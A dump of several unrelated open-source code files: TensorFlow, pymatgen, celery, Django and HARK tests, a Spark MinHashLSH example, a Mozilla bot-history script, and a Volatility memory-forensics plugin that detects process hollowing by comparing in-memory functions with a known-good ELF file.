      grad_r = tf.gradients(
          ys=[p0, r0], xs=[value_0, value_1],
          grad_ys=[
              [[2.0, 3.0], [4.0, 5.0]],  # upstream grad for pack() (2x2)
              [-0.5, 1.5]])              # upstream grad for read(0)
      grad_vals = sess.run(grad_r)  # 2 + 2 entries

      # value_0's gradient is pack()'s row 0 plus read(0)'s gradient.
      self.assertAllClose([2.0 - 0.5, 3.0 + 1.5], grad_vals[0])
      self.assertAllEqual([4.0, 5.0], grad_vals[1])
def testTensorArrayGradientWritePackAndRead(self):
self._testTensorArrayGradientWritePackAndRead(False)
self._testTensorArrayGradientWritePackAndRead(True)
  def _testTensorArrayGradientUnpackRead(self, use_gpu):
    """Gradients flow back through unpack(); duplicate reads aggregate."""
    with self.test_session(use_gpu=use_gpu) as sess:
      h = data_flow_ops.TensorArray(
          dtype=tf.float32, tensor_array_name="foo", size=2)
      value = tf.constant([[1.0, -1.0], [10.0, -10.0]])

      w = h.unpack(value)
      r0 = w.read(0)
      r0_1 = w.read(0)  # second read of index 0
      r1 = w.read(1)

      # Test combined gradients + aggregation of read(0)
      grad = tf.gradients(
          ys=[r0, r0_1, r1], xs=[value], grad_ys=
          [[2.0, 3.0], [-1.5, 1.5], [4.0, 5.0]])
      grad_vals = sess.run(grad)

      self.assertEqual(len(grad_vals), 1)
      # Row 0 sums the two read(0) grads; row 1 is read(1)'s grad unchanged.
      self.assertAllClose([[2.0 - 1.5, 3.0 + 1.5], [4.0, 5.0]], grad_vals[0])
def testTensorArrayGradientUnpackRead(self):
self._testTensorArrayGradientUnpackRead(False)
self._testTensorArrayGradientUnpackRead(True)
def _testCloseTensorArray(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
h = data_flow_ops.TensorArray(
dtype=tf.float32, tensor_array_name="foo", size=3)
c1 = h.close()
sess.run(c1)
def testCloseTensorArray(self):
self._testCloseTensorArray(use_gpu=False)
self._testCloseTensorArray(use_gpu=True)
  def _testWriteCloseTensorArray(self, use_gpu):
    """Writing after close() must fail; a repeated close() itself is benign."""
    with self.test_session(use_gpu=use_gpu):
      h = data_flow_ops.TensorArray(
          dtype=tf.float32, tensor_array_name="foo", size=3)
      w0 = h.write(0, [[4.0, 5.0]])
      w1 = w0.write(1, [3.0])
      w1.close().run()  # Expected to run without problems

      # A write sequenced after close() must raise with the closed-array error.
      with self.assertRaisesOpError(r"Tensor foo has already been closed."):
        with tf.control_dependencies([w1.close()]):
          w1.write(2, 3.0).flow.eval()
def testWriteCloseTensorArray(self):
self._testWriteCloseTensorArray(use_gpu=False)
self._testWriteCloseTensorArray(use_gpu=True)
if __name__ == "__main__":
  # Run the TensorArray test suite when executed directly.
  tf.test.main()
| apache-2.0 |
Bismarrck/pymatgen | pymatgen/apps/battery/tests/test_insertion_battery.py | 9 | 4792 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals
"""
Created on Jan 25, 2012
"""
__author__ = "Anubhav Jain, Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Anubhav Jain"
__email__ = "ajain@lbl.gov"
__date__ = "Jan 25, 2012"
import unittest
import os
import json
from pymatgen.entries.computed_entries import ComputedEntry
from pymatgen.apps.battery.insertion_battery import InsertionElectrode
from pymatgen import MontyEncoder, MontyDecoder
# Directory holding the JSON test fixtures, relative to this test module.
test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..", "..",
                        'test_files')
class InsertionElectrodeTest(unittest.TestCase):
    """Tests for InsertionElectrode built from LiTiO2 (vs Li) and MgVO (vs Mg)
    fixture entries stored as JSON in ``test_dir``."""

    def setUp(self):
        # Reference metallic-anode entry for the Li-based electrode.
        self.entry_Li = ComputedEntry("Li", -1.90753119)

        with open(os.path.join(test_dir, "LiTiO2_batt.json"), "r") as f:
            self.entries_LTO = json.load(f, cls=MontyDecoder)

        with open(os.path.join(test_dir, "MgVO_batt.json"), "r") as file:
            self.entries_MVO = json.load(file, cls=MontyDecoder)

        with open(os.path.join(test_dir, "Mg_batt.json"), "r") as file:
            self.entry_Mg = json.load(file, cls=MontyDecoder)

        self.ie_LTO = InsertionElectrode(self.entries_LTO, self.entry_Li)
        self.ie_MVO = InsertionElectrode(self.entries_MVO, self.entry_Mg)

    def test_voltage(self):
        #test basic voltage
        self.assertAlmostEqual(self.ie_LTO.max_voltage, 2.78583901, 3)
        self.assertAlmostEqual(self.ie_LTO.min_voltage, 0.89702381, 3)
        self.assertAlmostEqual(self.ie_LTO.get_average_voltage(), 1.84143141,
                               3)
        #test voltage range selectors
        self.assertAlmostEqual(self.ie_LTO.get_average_voltage(0, 1),
                               0.89702381, 3)
        self.assertAlmostEqual(self.ie_LTO.get_average_voltage(2, 3),
                               2.78583901, 3)
        #test non-existing voltage range
        self.assertAlmostEqual(self.ie_LTO.get_average_voltage(0, 0.1), 0, 3)
        self.assertAlmostEqual(self.ie_LTO.get_average_voltage(4, 5), 0, 3)

        self.assertAlmostEqual(self.ie_MVO.get_average_voltage(), 2.513767,3)

    def test_capacities(self):
        #test basic capacity
        self.assertAlmostEqual(self.ie_LTO.get_capacity_grav(), 308.74865045,
                               3)
        self.assertAlmostEqual(self.ie_LTO.get_capacity_vol(), 1205.99391136,
                               3)
        #test capacity selector
        self.assertAlmostEqual(self.ie_LTO.get_capacity_grav(1, 3),
                               154.374325225, 3)
        #test alternate normalization option
        self.assertAlmostEqual(self.ie_LTO.get_capacity_grav(1, 3, False),
                               160.803169506, 3)
        self.assertIsNotNone(self.ie_LTO.as_dict_summary(True))

        self.assertAlmostEqual(self.ie_MVO.get_capacity_grav(), 281.845548242, 3)
        self.assertAlmostEqual(self.ie_MVO.get_capacity_vol(), 1145.80087994, 3)

    def test_get_muO2(self):
        # LiTiO2 contains no oxygen grand-potential entries here.
        self.assertIsNone(self.ie_LTO.get_max_muO2())

    def test_entries(self):
        #test that the proper number of sub-electrodes are returned
        self.assertEqual(len(self.ie_LTO.get_sub_electrodes(False, True)), 3)
        self.assertEqual(len(self.ie_LTO.get_sub_electrodes(True, True)), 2)

    def test_get_all_entries(self):
        # Smoke test: should not raise.
        self.ie_LTO.get_all_entries()

    def test_to_from_dict(self):
        # Round-trip through as_dict/from_dict must preserve voltages.
        d = self.ie_LTO.as_dict()
        ie = InsertionElectrode.from_dict(d)
        self.assertAlmostEqual(ie.max_voltage, 2.78583901, 3)
        self.assertAlmostEqual(ie.min_voltage, 0.89702381, 3)
        self.assertAlmostEqual(ie.get_average_voltage(), 1.84143141, 3)

        #Just to make sure json string works.
        json_str = json.dumps(self.ie_LTO, cls=MontyEncoder)
        ie = json.loads(json_str, cls=MontyDecoder)
        self.assertAlmostEqual(ie.max_voltage, 2.78583901, 3)
        self.assertAlmostEqual(ie.min_voltage, 0.89702381, 3)
        self.assertAlmostEqual(ie.get_average_voltage(), 1.84143141, 3)

    def test_voltage_pair(self):
        # First voltage pair of the LTO electrode.
        vpair = self.ie_LTO[0]
        self.assertAlmostEqual(vpair.voltage, 2.78583901)
        self.assertAlmostEqual(vpair.mAh, 13400.7411749, 2)
        self.assertAlmostEqual(vpair.mass_charge, 79.8658)
        self.assertAlmostEqual(vpair.mass_discharge, 83.3363)
        self.assertAlmostEqual(vpair.vol_charge, 37.553684467)
        self.assertAlmostEqual(vpair.vol_discharge, 37.917719932)
        self.assertAlmostEqual(vpair.frac_charge, 0.0)
        self.assertAlmostEqual(vpair.frac_discharge, 0.14285714285714285)
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| mit |
vipul-sharma20/oh-mainline | vendor/packages/celery/celery/tests/test_events/test_events_snapshot.py | 18 | 3412 | from __future__ import absolute_import
from __future__ import with_statement
from celery.app import app_or_default
from celery.events import Events
from celery.events.snapshot import Polaroid, evcam
from celery.tests.utils import unittest
class TRef(object):
    """Fake timer entry: records whether it was fired and/or cancelled."""

    active = True
    called = False

    def __call__(self):
        # Firing the ref just flags that it ran.
        self.called = True

    def cancel(self):
        # Cancelling deactivates the ref without running it.
        self.active = False
class MockTimer(object):
    """Fake timer that records scheduled callbacks instead of running them."""

    installed = []

    def apply_interval(self, msecs, fun, *args, **kwargs):
        """Register *fun* as installed and hand back a cancellable TRef."""
        MockTimer.installed.append(fun)
        return TRef()
timer = MockTimer()
class test_Polaroid(unittest.TestCase):
    """Tests for the Polaroid event-snapshot camera."""

    def setUp(self):
        self.app = app_or_default()
        self.state = self.app.events.State()

    def test_constructor(self):
        x = Polaroid(self.state, app=self.app)
        self.assertIs(x.app, self.app)
        self.assertIs(x.state, self.state)
        self.assertTrue(x.freq)
        self.assertTrue(x.cleanup_freq)
        self.assertTrue(x.logger)
        self.assertFalse(x.maxrate)

    def test_install_timers(self):
        x = Polaroid(self.state, app=self.app)
        x.timer = timer
        x.__exit__()
        x.__enter__()
        # Entering installs both the capture and cleanup interval callbacks.
        self.assertIn(x.capture, MockTimer.installed)
        self.assertIn(x.cleanup, MockTimer.installed)
        self.assertTrue(x._tref.active)
        self.assertTrue(x._ctref.active)
        x.__exit__()
        # Exiting cancels both refs; the capture ref is fired once on exit,
        # the cleanup ref is not.
        self.assertFalse(x._tref.active)
        self.assertFalse(x._ctref.active)
        self.assertTrue(x._tref.called)
        self.assertFalse(x._ctref.called)

    def test_cleanup(self):
        x = Polaroid(self.state, app=self.app)
        cleanup_signal_sent = [False]

        def handler(**kwargs):
            cleanup_signal_sent[0] = True
        x.cleanup_signal.connect(handler)
        x.cleanup()
        self.assertTrue(cleanup_signal_sent[0])

    def test_shutter__capture(self):
        x = Polaroid(self.state, app=self.app)
        shutter_signal_sent = [False]

        def handler(**kwargs):
            shutter_signal_sent[0] = True
        x.shutter_signal.connect(handler)
        x.shutter()
        self.assertTrue(shutter_signal_sent[0])

        shutter_signal_sent[0] = False
        x.capture()
        self.assertTrue(shutter_signal_sent[0])

    def test_shutter_maxrate(self):
        x = Polaroid(self.state, app=self.app, maxrate="1/h")
        shutter_signal_sent = [0]

        def handler(**kwargs):
            shutter_signal_sent[0] += 1
        x.shutter_signal.connect(handler)
        # With a 1/h rate limit only the first of many rapid calls may fire.
        for i in range(30):
            x.shutter()
            x.shutter()
            x.shutter()
        self.assertEqual(shutter_signal_sent[0], 1)
class test_evcam(unittest.TestCase):
    """Tests for the evcam entry point using a stubbed event receiver."""

    class MockReceiver(object):
        # When True, capture() simulates the user pressing Ctrl-C.
        raise_keyboard_interrupt = False

        def capture(self, **kwargs):
            if self.__class__.raise_keyboard_interrupt:
                raise KeyboardInterrupt()

    class MockEvents(Events):
        def Receiver(self, *args, **kwargs):
            return test_evcam.MockReceiver()

    def setUp(self):
        self.app = app_or_default()
        self.app.events = self.MockEvents()

    def test_evcam(self):
        evcam(Polaroid, timer=timer)
        evcam(Polaroid, timer=timer, loglevel="CRITICAL")
        # A KeyboardInterrupt inside capture must exit cleanly via SystemExit.
        self.MockReceiver.raise_keyboard_interrupt = True
        with self.assertRaises(SystemExit):
            evcam(Polaroid, timer=timer)
| agpl-3.0 |
esi-mineset/spark | examples/src/main/python/ml/min_hash_lsh_example.py | 52 | 3222 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
An example demonstrating MinHashLSH.
Run with:
bin/spark-submit examples/src/main/python/ml/min_hash_lsh_example.py
"""
from __future__ import print_function
# $example on$
from pyspark.ml.feature import MinHashLSH
from pyspark.ml.linalg import Vectors
from pyspark.sql.functions import col
# $example off$
from pyspark.sql import SparkSession
if __name__ == "__main__":
    spark = SparkSession \
        .builder \
        .appName("MinHashLSHExample") \
        .getOrCreate()

    # $example on$
    # Two small sparse binary datasets used for the similarity join below.
    dataA = [(0, Vectors.sparse(6, [0, 1, 2], [1.0, 1.0, 1.0]),),
             (1, Vectors.sparse(6, [2, 3, 4], [1.0, 1.0, 1.0]),),
             (2, Vectors.sparse(6, [0, 2, 4], [1.0, 1.0, 1.0]),)]
    dfA = spark.createDataFrame(dataA, ["id", "features"])

    dataB = [(3, Vectors.sparse(6, [1, 3, 5], [1.0, 1.0, 1.0]),),
             (4, Vectors.sparse(6, [2, 3, 5], [1.0, 1.0, 1.0]),),
             (5, Vectors.sparse(6, [1, 2, 4], [1.0, 1.0, 1.0]),)]
    dfB = spark.createDataFrame(dataB, ["id", "features"])

    # Probe key for the nearest-neighbor search at the end.
    key = Vectors.sparse(6, [1, 3], [1.0, 1.0])

    mh = MinHashLSH(inputCol="features", outputCol="hashes", numHashTables=5)
    model = mh.fit(dfA)

    # Feature Transformation
    print("The hashed dataset where hashed values are stored in the column 'hashes':")
    model.transform(dfA).show()

    # Compute the locality sensitive hashes for the input rows, then perform approximate
    # similarity join.
    # We could avoid computing hashes by passing in the already-transformed dataset, e.g.
    # `model.approxSimilarityJoin(transformedA, transformedB, 0.6)`
    print("Approximately joining dfA and dfB on distance smaller than 0.6:")
    model.approxSimilarityJoin(dfA, dfB, 0.6, distCol="JaccardDistance")\
        .select(col("datasetA.id").alias("idA"),
                col("datasetB.id").alias("idB"),
                col("JaccardDistance")).show()

    # Compute the locality sensitive hashes for the input rows, then perform approximate nearest
    # neighbor search.
    # We could avoid computing hashes by passing in the already-transformed dataset, e.g.
    # `model.approxNearestNeighbors(transformedA, key, 2)`
    # It may return less than 2 rows when not enough approximate near-neighbor candidates are
    # found.
    print("Approximately searching dfA for 2 nearest neighbors of the key:")
    model.approxNearestNeighbors(dfA, key, 2).show()

    # $example off$
    spark.stop()
| apache-2.0 |
mozilla/bztools | auto_nag/history.py | 1 | 16781 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from pprint import pprint
from libmozdata.bugzilla import Bugzilla
from auto_nag import logger
class History(object):
    """Collects and classifies the changes/comments made by the release-mgmt bot."""

    # Bugzilla account whose activity is being audited.
    BOT = "release-mgmt-account-bot@mozilla.tld"

    def __init__(self):
        super(History, self).__init__()
    def get_bugs(self):
        """Return the set of bug ids the bot ever changed or commented on."""
        logger.info("History: get bugs: start...")

        def bug_handler(bug, data):
            data.add(bug["id"])

        # Search fields, grouped by the Bugzilla query operator to use:
        # "changedby" finds bugs where the bot edited the field, "equals"
        # finds bugs where the bot is the commenter / flag setter.
        fields = {
            "changedby": [
                "keywords",
                "product",
                "component",
                "assigned_to",
                "cf_crash_signature",
                "everconfirmed",
                "cf_has_regression_range",
                "cf_has_str",
                "priority",
                "bug_severity",
                "resolution",
                "bug_status",
                "bug_type",
                "cf_status_firefox68",
                "cf_status_firefox67",
                "cf_status_firefox66",
                "cf_status_firefox65",
                "cf_status_firefox64",
                "cf_status_firefox63",
                "cf_status_firefox62",
            ],
            "equals": ["commenter", "setters.login_name"],
        }

        queries = []
        bugids = set()
        for op, fs in fields.items():
            for f in fs:
                params = {"include_fields": "id", "f1": f, "o1": op, "v1": History.BOT}
                queries.append(
                    Bugzilla(params, bughandler=bug_handler, bugdata=bugids, timeout=20)
                )

        # Fire all queries, then wait for each to complete; all handlers
        # accumulate into the shared ``bugids`` set.
        for q in queries:
            q.get_data().wait()

        logger.info("History: get bugs: end.")

        return bugids
    def get_bug_info(self, bugids):
        """Fetch the bot-authored history entries and comments for *bugids*.

        Returns a dict mapping str(bugid) to a list mixing history-change
        dicts (with a "when" key) and comment dicts (with a "date" key).
        """
        logger.info("History: get bugs info: start...")

        def history_handler(bug, data):
            bugid = str(bug["id"])
            for h in bug["history"]:
                if h["who"] == History.BOT:
                    # The author is implied (always the bot), so drop it.
                    del h["who"]
                    data[bugid].append(h)

        def comment_handler(bug, bugid, data):
            bugid = str(bugid)
            for comment in bug["comments"]:
                if comment["author"] == History.BOT:
                    text = comment["text"]
                    data[bugid].append(
                        {"comment": text, "date": comment["creation_time"]}
                    )

        data = {str(bugid): [] for bugid in bugids}

        Bugzilla(
            list(data.keys()),
            historyhandler=history_handler,
            historydata=data,
            commenthandler=comment_handler,
            commentdata=data,
            timeout=960,
        ).get_data().wait()

        logger.info("History: get bugs info: end.")

        return data
def cleanup(self, data):
# res is a dictionary: change_date_time => change or comment
res = {}
for bugid, info in data.items():
res[bugid] = x = {}
for c in info:
if "changes" in c:
when = c["when"]
del c["when"]
if when not in x:
x[when] = {"changes": c["changes"]}
else:
x[when]["changes"] += c["changes"]
if "comment" in c:
when = c["date"]
del c["date"]
if when not in x:
x[when] = {"comment": c["comment"]}
else:
x[when]["comment"] = c["comment"]
return res
def get_pc(self, changes):
p = ""
c = ""
for change in changes:
if change.get("field_name") == "component" and "added" in change:
c = change["added"]
if change.get("field_name") == "product" and "added" in change:
p = change["added"]
return "{}::{}".format(p, c)
def get_ni(self, changes):
for change in changes:
if change.get("field_name") == "flagtypes.name" and "added" in change:
c = change["added"]
ni = "needinfo?("
if c.startswith(ni):
return c[len(ni) : -1]
return ""
    def guess_tool(self, data):
        """Attribute each bot change/comment to the auto-nag tool that made it.

        ``data`` is the output of :meth:`cleanup`. Returns a list of dicts
        {"tool", "date", "bugid", "extra"}; entries that match no known tool
        pattern are collected and dumped via pprint for manual inspection.
        """
        res = []
        no_tool = []

        for bugid, info in data.items():
            for date, i in info.items():
                if "comment" in i:
                    c = i["comment"]
                    # Crash-volume comments are informational, not a tool action.
                    if c.startswith("Crash volume for signature"):
                        continue
                    tool = None
                    # Match the comment's opening text against the canned
                    # messages each tool posts.
                    if c.startswith(
                        "The leave-open keyword is there and there is no activity for"
                    ):
                        tool = "leave_open_no_activity"
                    elif c.startswith("Closing because no crashes reported for"):
                        tool = "no_crashes"
                    elif c.startswith("Moving to p3 because no activity for at least"):
                        tool = "old_p2_bug"
                    elif c.startswith("Moving to p2 because no activity for at least"):
                        tool = "old_p1_bug"
                    elif c.startswith(
                        "There's a r+ patch which didn't land and no activity in this bug"
                    ) or c.startswith(
                        "There are some r+ patches which didn't land and no activity in this bug for"
                    ):
                        tool = "not_landed"
                    elif c.startswith(
                        "The meta keyword is there, the bug doesn't depend on other bugs and there is no activity for"
                    ):
                        tool = "meta_no_deps_no_activity"
                    elif (
                        "[mozregression](https://wiki.mozilla.org/Auto-tools/Projects/Mozregression)"
                        in c
                    ):
                        tool = "has_str_no_range"
                    elif (
                        "as the bug is tracked by a release manager for the current nightly"
                        in c
                    ):
                        tool = "mismatch_priority_tracking_nightly"
                    elif (
                        "as the bug is tracked by a release manager for the current beta"
                        in c
                    ):
                        tool = "mismatch_priority_tracking_beta"
                    elif (
                        "as the bug is tracked by a release manager for the current release"
                        in c
                    ):
                        tool = "mismatch_priority_tracking_release"
                    elif c.startswith("The priority flag is not set for this bug.\n:"):
                        tool = "no_priority"
                    elif c.startswith(
                        "The priority flag is not set for this bug and there is no activity for"
                    ):
                        tool = "ni_triage_owner"

                    if tool is None:
                        no_tool.append((bugid, info))
                    else:
                        # The needinfo requestee (if any) set alongside the comment.
                        extra = self.get_ni(i.get("changes", []))
                        res.append(
                            {"tool": tool, "date": date, "bugid": bugid, "extra": extra}
                        )
                else:
                    # No comment: classify by the first recognizable field change.
                    changes = i["changes"]
                    N = len(res)
                    for change in changes:
                        if change.get("added") == "meta":
                            res.append(
                                {
                                    "tool": "summary_meta_missing",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif change.get("field_name") in {"component", "product"}:
                            res.append(
                                {
                                    "tool": "component",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": self.get_pc(changes),
                                }
                            )
                            break
                        elif change.get("field_name") == "cf_has_str":
                            res.append(
                                {
                                    "tool": "has_str_no_hasstr",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif change.get("removed") == "leave-open":
                            res.append(
                                {
                                    "tool": "leave_open",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif change.get("field_name") == "assigned_to":
                            res.append(
                                {
                                    "tool": "no_assignee",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": change["added"],
                                }
                            )
                            break
                        elif (
                            change.get("field_name", "").startswith("cf_status_firefox")
                            and change.get("added") == "affected"
                        ):
                            res.append(
                                {
                                    "tool": "nighty_reopened",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif (
                            change.get("field_name") == "status"
                            and change.get("added") == "ASSIGNED"
                        ):
                            res.append(
                                {
                                    "tool": "assignee_but_unconfirmed",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif (
                            change.get("field_name") == "keywords"
                            and change.get("added") == "regression"
                        ):
                            res.append(
                                {
                                    "tool": "regression",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif (
                            change.get("field_name") == "severity"
                            and change.get("added") == "major"
                        ):
                            res.append(
                                {
                                    "tool": "tracked_bad_severity",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif change.get("field_name") == "cf_crash_signature":
                            res.append(
                                {
                                    "tool": "copy_duplicate_info",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif (
                            change.get("field_name") == "keywords"
                            and change.get("removed") == "stalled"
                        ):
                            # NOTE(review): this branch reports "regression" for a
                            # stalled-keyword removal — looks like a copy/paste of
                            # the regression branch above; confirm the intended
                            # tool name.
                            res.append(
                                {
                                    "tool": "regression",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif (
                            change.get("field_name") == "type"
                            and change.get("added") == "defect"
                        ):
                            res.append(
                                {
                                    "tool": "regression_but_type_enhancement_task",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif (
                            change.get("field_name") == "keywords"
                            and change.get("removed") == "dupeme"
                        ):
                            res.append(
                                {
                                    "tool": "closed_dupeme",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif (
                            change.get("field_name") == "keywords"
                            and change.get("added") == "dupeme"
                        ):
                            res.append(
                                {
                                    "tool": "dupeme_whiteboard_keyword",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif change.get("field_name") == "summary" and change.get(
                            "added"
                        ).startswith("[meta]"):
                            res.append(
                                {
                                    "tool": "meta_summary_missing",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break
                        elif change.get("field_name", "").startswith(
                            "cf_status_firefox"
                        ) and change.get("added") in {
                            "?",
                            "fixed",
                            "verified",
                            "unaffected",
                        }:
                            res.append(
                                {
                                    "tool": "missing_beta_status",
                                    "date": date,
                                    "bugid": bugid,
                                    "extra": "",
                                }
                            )
                            break

                    # Nothing was appended: no pattern matched this change set.
                    if len(res) == N:
                        no_tool.append((bugid, info))

        # Debug dump of everything that could not be attributed to a tool.
        if no_tool:
            pprint(no_tool)

        return res
def get(self):
bugids = self.get_bugs()
bugs = self.get_bug_info(bugids)
bugs = self.cleanup(bugs)
history = self.guess_tool(bugs)
return history
| bsd-3-clause |
econ-ark/HARK | HARK/ConsumptionSaving/tests/test_SmallOpenEconomy.py | 1 | 1397 | import copy
from HARK import distribute_params
from HARK.ConsumptionSaving.ConsAggShockModel import (
AggShockConsumerType,
SmallOpenEconomy,
init_cobb_douglas,
)
from HARK.distribution import Uniform
import numpy as np
import unittest
class testSmallOpenEconomy(unittest.TestCase):
    """Smoke test: build and solve a SmallOpenEconomy with heterogeneous agents."""

    def test_small_open(self):
        agent = AggShockConsumerType()
        agent.AgentCount = 100  # Very low number of agents for the sake of speed
        agent.cycles = 0

        # Make agents heterogeneous in their discount factor
        agents = distribute_params(
            agent, "DiscFac", 3, Uniform(bot=0.90, top=0.94)  # Impatient agents
        )

        # Make an economy with those agents living in it
        small_economy = SmallOpenEconomy(
            agents=agents,
            Rfree=1.03,
            wRte=1.0,
            KtoLnow=1.0,
            **copy.copy(init_cobb_douglas)
        )

        small_economy.act_T = 400  # Short simulation history
        small_economy.max_loops = 3  # Give up quickly for the sake of time
        small_economy.make_AggShkHist()  # Simulate a history of aggregate shocks
        small_economy.verbose = False  # Turn off printed messages

        # Give data about the economy to all the agents in it
        for this_type in small_economy.agents:
            this_type.get_economy_data(small_economy)

        # Solving without raising is the success criterion of this smoke test.
        small_economy.solve()
| apache-2.0 |
sephii/django | tests/template_tests/filter_tests/test_pluralize.py | 430 | 1200 | from decimal import Decimal
from django.template.defaultfilters import pluralize
from django.test import SimpleTestCase
class FunctionTests(SimpleTestCase):
    """Behavioural tests for the ``pluralize`` template filter."""

    def test_integers(self):
        for value, expected in ((1, ''), (0, 's'), (2, 's')):
            self.assertEqual(pluralize(value), expected)

    def test_floats(self):
        # Any non-1 float counts as plural.
        for value in (0.5, 1.5):
            self.assertEqual(pluralize(value), 's')

    def test_decimals(self):
        for value, expected in ((Decimal(1), ''), (Decimal(0), 's'),
                                (Decimal(2), 's')):
            self.assertEqual(pluralize(value), expected)

    def test_lists(self):
        # For sequences, pluralization follows the length.
        for value, expected in (([1], ''), ([], 's'), ([1, 2, 3], 's')):
            self.assertEqual(pluralize(value), expected)

    def test_suffixes(self):
        cases = (
            (1, 'es', ''),
            (0, 'es', 'es'),
            (2, 'es', 'es'),
            (1, 'y,ies', 'y'),
            (0, 'y,ies', 'ies'),
            (2, 'y,ies', 'ies'),
            # More than two comma-separated suffixes is invalid -> empty.
            (0, 'y,ies,error', ''),
        )
        for value, suffix, expected in cases:
            self.assertEqual(pluralize(value, suffix), expected)
| bsd-3-clause |
shantanu561993/volatility | volatility/plugins/linux/process_hollow.py | 14 | 4604 | # Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License Version 2 as
# published by the Free Software Foundation. You may not use, modify or
# distribute this program under any other version of the GNU General
# Public License.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import volatility.obj as obj
import volatility.debug as debug
import volatility.addrspace as addrspace
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.pslist as linux_pslist
class linux_process_hollow(linux_pslist.linux_pslist):
    """Checks for signs of process hollowing"""

    def __init__(self, config, *args, **kwargs):
        linux_pslist.linux_pslist.__init__(self, config, *args, **kwargs)
        self._config.add_option('BASE', short_option = 'b', default = None, help = 'The address of the ELF file in memory', action = 'store', type='long' )
        self._config.add_option('PATH', short_option = 'P', default = None, help = 'The path of the known good file', action = 'store', type='str')

    # TODO:
    # make aware of if application or library
    # check the class, then do offset + base based on that

    def calculate(self):
        """Yield (task, symbol name, address) for every function whose
        in-memory bytes differ from the known-good on-disk ELF."""
        linux_common.set_plugin_members(self)

        if not self._config.BASE:
            debug.error("No base address specified.")

        if not self._config.PATH:
            debug.error("No known-good path specified.")

        # Read the trusted on-disk ELF and parse its header through a
        # buffer-backed address space.
        fd = open(self._config.PATH, "rb")
        known_good = fd.read()
        fd.close()

        bufferas = addrspace.BufferAddressSpace(self._config, data = known_good)
        elf_hdr = obj.Object("elf_hdr", offset = 0, vm = bufferas)

        tasks = linux_pslist.linux_pslist.calculate(self)

        for task in tasks:
            proc_as = task.get_process_address_space()

            for vma in task.get_proc_maps():
                # Only inspect the mapping the user pointed us at.
                if self._config.BASE != vma.vm_start:
                    continue

                for sym in elf_hdr.symbols():
                    # Skip undefined symbols and non-functions
                    # (st_info type 2 == STT_FUNC).
                    if sym.st_value == 0 or (sym.st_info & 0xf) != 2:
                        continue

                    symname = elf_hdr.symbol_name(sym)
                    sym_offset = sym.st_value

                    # in the same vma
                    if vma.vm_start < sym.st_value < vma.vm_end:
                        vm_start = vma.vm_start
                        sym_offset = sym_offset - vm_start
                        full_address = sym.st_value
                    else:
                        next_vma = vma.vm_next
                        if next_vma.vm_start < sym.st_value < next_vma.vm_end:
                            vm_start = next_vma.vm_start
                            sym_offset = sym.st_value - vm_start
                            full_address = sym.st_value
                        else:
                            # NOTE(review): in this branch vm_start is not
                            # (re)assigned, so the read below uses a stale or
                            # undefined vm_start — confirm intended behavior.
                            full_address = vma.vm_start + sym.st_value

                    mem_buffer = proc_as.read(vm_start + sym_offset, sym.st_size)

                    if sym.st_value > vma.vm_start:
                        disk_off = sym.st_value - vm_start
                    else:
                        disk_off = sym.st_value

                    disk_buffer = bufferas.read(disk_off, sym.st_size)

                    # bad
                    if mem_buffer != None and disk_buffer != mem_buffer:
                        yield task, symname, full_address
                    elif mem_buffer == None:
                        print "Function %s paged out in memory" % symname

    def render_text(self, outfd, data):
        """Print one table row per mismatching function."""
        self.table_header(outfd, [("Task", "16"),
                                  ("PID", "6"),
                                  ("Symbol Name", "32"),
                                  ("Symbol Address", "[addrpad]"),
                                  ])

        for (task, symname, address) in data:
            self.table_row(outfd, str(task.comm), task.pid, symname, address)
| gpl-2.0 |
